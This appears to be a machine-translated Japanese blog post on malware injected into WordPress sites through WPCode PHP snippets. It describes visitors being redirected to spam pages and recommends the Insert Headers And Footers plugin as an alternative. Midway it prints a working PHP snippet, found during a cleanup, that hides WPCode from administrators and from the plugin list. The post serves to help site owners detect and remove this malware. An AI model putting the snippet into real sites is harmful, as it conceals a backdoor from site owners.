WordPress サイトのヘッダーやフッターにスクリプトを追加したい場合は、さまざまな方法で可能です。チャイルドテーマの関数ファイルを介してコードを追加する方法をお勧めしますが、 WordPress 管理ページでスクリプトを追加したい場合は、WPCodeを使用できます。
しかし、近年、WPCodeを通じてマルウェアが挿入される場合が増えています。 WPCodeを使用すると、HTML / JavaScriptコードだけでなくPHPコードも挿入できます。 WPCodeに悪意のあるスクリプトを追加し、WPCodeが管理者ページのプラグインリストに表示されないようにするケースが表示されています。
WPコードの代わりに、Insert Headers And Footersプラグインを検討することができます。このプラグインを使用してHTML / JavaScriptを追加できますが、PHPコードは使用できません。 JavaScriptコードを介してマルウェアが侵入する可能性がありますが、PHPを実行できないため、WPCodeと比較して少し安全です。
WordPress ヘッダ/フッタコードの挿入、WPCodeよりも安全な方法は?
WPCodeを介したマルウェアの流入
個人的にはWPCodeのようなプラグインの使用をお勧めしませんが、FTP/SFTPに接続せず簡単に WordPress 管理者ページで簡単にHTML / JavaScriptコードを追加したい場合は、このプラグインを使用できます。
参考までに GeneratePress テーマを使用している場合は、Elements機能を使用して、ヘッダーとフッターだけでなく、任意の場所にHTML / JavaScript / PHPコードを挿入できます。
WPCodeでは、PHPコードも追加できます。
管理者ページからPHPコードを挿入できる場合は、ほとんどすべてのコードをテーマ関数ファイルの代わりにWPCode内に追加することができます。
WPCodeのPHPスニペットを介してマルウェアが挿入され、訪問者がサイトにアクセスしたときに奇妙なスパムサイトにリダイレクトされるかポップアップが表示されるケースが増えています。たとえば、下の図に示すように、iPhone 15 Proに当選したというページにアクセスできます。
次のようないくつかの特徴があります。
- WPCodeプラグインは通知パネルのプラグインリストに表示されません。
- 訪問者がサイトにアクセスすると、奇妙なポップアップが表示されるか、スパムサイトにリダイレクトされます。
- 管理者としてログインしても異常な症状は発生しません。
- 同じPCや電話でも異常症状が現れません。
数ヶ月前、このような症状のマルウェア治療を受けたことがありました。最初はどこからマルウェアが流入するのかを見つけるのに少し時間がかかりました。マルウェアを見てみると、管理者ページでWPCodeプラグインを隠すコードがPHPスニペットとして追加されていました。
$_pwsa = '489558521040c71da15b24fd6c289e2e';
if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
add_action('admin_head', function () {
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
});
add_action('wp_head', function () {
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
});
add_filter('all_plugins', function ($plugins) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
return $plugins;
});
}最近、マルウェアは悪質なのがログインユーザーや管理者でアクセスしたり、マイコンピュータや電話で接続するときにはマルウェアの症状が現れず、訪問者がサイトを接続すると異常症状が現れることです。
Cafe24クラウドウェイズなどは独自のバックアップ/復元機能を提供します。 Cafe24は去る7日、 クラウドウェイズ(バックアップ設定に応じて)最大4週間以内の期間にサイトをロールバックできます。
ただし、管理者がマルウェアの症状を認識しておらず、訪問者がこれを知らせるまでマルウェア感染を認識できない可能性があります。
サイトがマルウェアに感染してリダイレクトが発生した場合、訪問者の数が急減するなど、SEOの問題が発生する可能性があるため、早期に検出してマルウェアを削除することが重要です。
ちなみに、クラウドウェイズはマルウェア保護機能を介してマルウェア検出時に警告メールを送信します。
WPCodeの代替... Insert Headers And Footersプラグイン
WPCodeなどのプラグインを使用しないことは安全ですが、通知パネルにHTML / JSコードを追加したい場合 Insert Headers And Footers プラグインを代替として考えることができます。
WPCodeはPHPコードまで挿入が可能で、機能と利便性の面では優れていますが、それだけリスクが増加します。 Insert Headers And FootersはHTML / JSコードを挿入できますが、PHPコードはサポートしていません。
このプラグインは、 WordPress 管理者ページ » プラグイン » プラグインの追加で「Insert Headers And Footers」を検索してインストールできます。
WPCodeはヘッダーやフッターにスクリプトを追加する機能に加えて、さまざまなPHPコードライブラリを提供し、PHPコードを追加する機能を提供しますが、Insert Headers And FootersプラグインはヘッダーやフッターにHTML / JSコードを追加する機能のみを提供します。
このプラグインにPHPコードを追加してテストしてみると、PHP部分は無視され、残りのスクリプトが実行されました。
このプラグインの機能:
- WordPress サイトのヘッダーとフッターにコードを挿入可能
- Google アナリティクス (Google Analytics) コードを挿入可能
- Facebook ピクセルコード挿入可能
- A/B テスト用の Google オプティマイズコードを追加可能
- Google Search Console認証コードをテーマに挿入してサイトの所有権を確認できます(Naver ウェブマスターツールサイト所有確認コードも追加可能)
- カスタムCSS、スクリプト、HTMLコードを挿入可能
- Googleタグマネージャコードを挿入可能
- マイクロソフト・クラリティー(Microsoft Clarity)トラッキングコードを挿入可能
- ウェブサイト本文(body)領域にもコード挿入可能
- Bingウェブマスターツールコードでサイト認証可能
- 구글 AdSense(AdSense)コード挿入可能
WPCodeの選択肢を探している場合は、このプラグインを検討してください。このプラグインは5.0万点に5.0でユーザー評価も良い方です。 😄
最後に、
以上で、WPCodeプラグインの代替として使用できるInsert Headers And Footersプラグインについて見てきました。
WPCodeからマルウェアが流入して奇妙なサイトにリダイレクトされるなどの問題が発生した場合、まずWPCodeを削除すると症状が消えることがあります。ただし、マルウェアが挿入された原因を特定して完全に削除しないと、いつでも再発します。
👉マルウェア感染を含む WordPress またはWebホスティングの問題で解決するのが難しい場合 ここでサービス(有料)をご依頼することができます。
コメントを残す